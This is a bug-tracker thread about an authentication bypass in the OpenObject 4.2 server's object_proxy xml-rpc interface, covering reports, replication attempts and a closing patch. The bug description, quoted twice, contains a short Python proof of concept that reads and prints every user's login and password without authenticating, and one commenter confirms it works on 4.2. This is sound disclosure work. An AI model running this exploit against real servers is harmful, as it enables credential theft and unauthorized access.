[4.2] Netsvc object_proxy bypass

Anyone of the QT has seen this bug??
There are a lot of working servers in Internet that has this bug...

Attatch one of the possibles exploits?field.comment=Anyone of the QT has seen this bug??
There are a lot of working servers in Internet that has this bug...

Attatch one of the possibles exploits

Hello Eduard,

Thank you for your interest.

We have tried the workaround suggested by you.
when we work through your patch, it gives xmlrpclib.ProtocolError: <ProtocolError for localhost:8069/xmlrpc/object_proxy: 404 Not Found> error.

If I improve it by object(i.e. xmlrpclib.ServerProxy('http://%s:%d/xmlrpc/object' % (host,int(port)))), it works and creates the socket.

But when I try to go for sock.execute, it gives us the error of AccessDenied which is quite obvious.

The code:
f = sock.execute(dbname, 1, 'res.users', 'search', [])

Here, it will definately give you the error of access because the arguments do not match.
Look at the definition :
execute(self, db, uid, passwd, object, method, *args).

However, we will be honored if we get more appropriate information from you and will sort out this issue very soon.

Thank you again.

Today, 4 months after the vulnerability still there...

I re-attach the exploit...

Hi, i tested in stable revno.2041 and the xploit is invalid

I tried to use this and I can not replicate this bug, can you guide me
please!

2010/4/26 Eduard Carreras i Nadal <email address hidden>

> Today, 4 months after the vulnerability still there...
>
> I re-attach the exploit...
>
> ** Attachment added: "get_all_users_pass.py"
> http://launchpadlibrarian.net/45524184/get_all_users_pass.py
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of object xml-rpc interface using another
> interface called object_proxy. The only requisit is that server is
> initialitzed (eg. someone do the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't undersant why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login',
> 'password'])
> for u in f:
> print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>

--
Saludos Cordiales

Nhomar G. Hernandez M.
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://geronimo.com.ve
Servicios IT: http://openerp.netquatro.com
Linux-Counter: 467724
Correos:
<email address hidden>
<email address hidden>

Hi....

          ./get_all_users_pass.py "nueva_2"
Traceback (most recent call last):
  File "./get_all_users_pass.py", line 27, in <module>
    db_list = dbsock.list()
  File "/usr/lib/python2.6/xmlrpclib.py", line 1199, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib/python2.6/xmlrpclib.py", line 1489, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.6/xmlrpclib.py", line 1237, in request
    errcode, errmsg, headers = h.getreply()
  File "/usr/lib/python2.6/httplib.py", line 1048, in getreply
    response = self._conn.getresponse()
  File "/usr/lib/python2.6/httplib.py", line 974, in getresponse
    response.begin()
  File "/usr/lib/python2.6/httplib.py", line 391, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python2.6/httplib.py", line 349, in _read_status
    line = self.fp.readline()
  File "/usr/lib/python2.6/socket.py", line 397, in readline
    data = recv(1)
socket.error: [Errno 104] Connection reset by peer

on revno: 1999

2010/4/26 Cristian Salamea (GnuThink) <email address hidden>

> Hi, i tested in stable revno.2041 and the xploit is invalid
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of object xml-rpc interface using another
> interface called object_proxy. The only requisit is that server is
> initialitzed (eg. someone do the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't undersant why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login',
> 'password'])
> for u in f:
> print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>

--
Saludos Cordiales

Nhomar G. Hernandez M.
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://geronimo.com.ve
Servicios IT: http://openerp.netquatro.com
Linux-Counter: 467724
Correos:
<email address hidden>
<email address hidden>

This is a 4.2 *only* exploit... as you can see in the description and in related branches

Again, i tested with 4.2 version as Eduard told me via IRC, and it works, show all users and passwords from server

@Nhomar only *4.2*

Hi all,

You can find the patch in this revision.

revision-id: <email address hidden>
date: 2010-04-27 08:29:46 +0200
build-date: 2010-04-27 08:31:05 +0200
revno: 28
branch-nick: server

Thank you so much.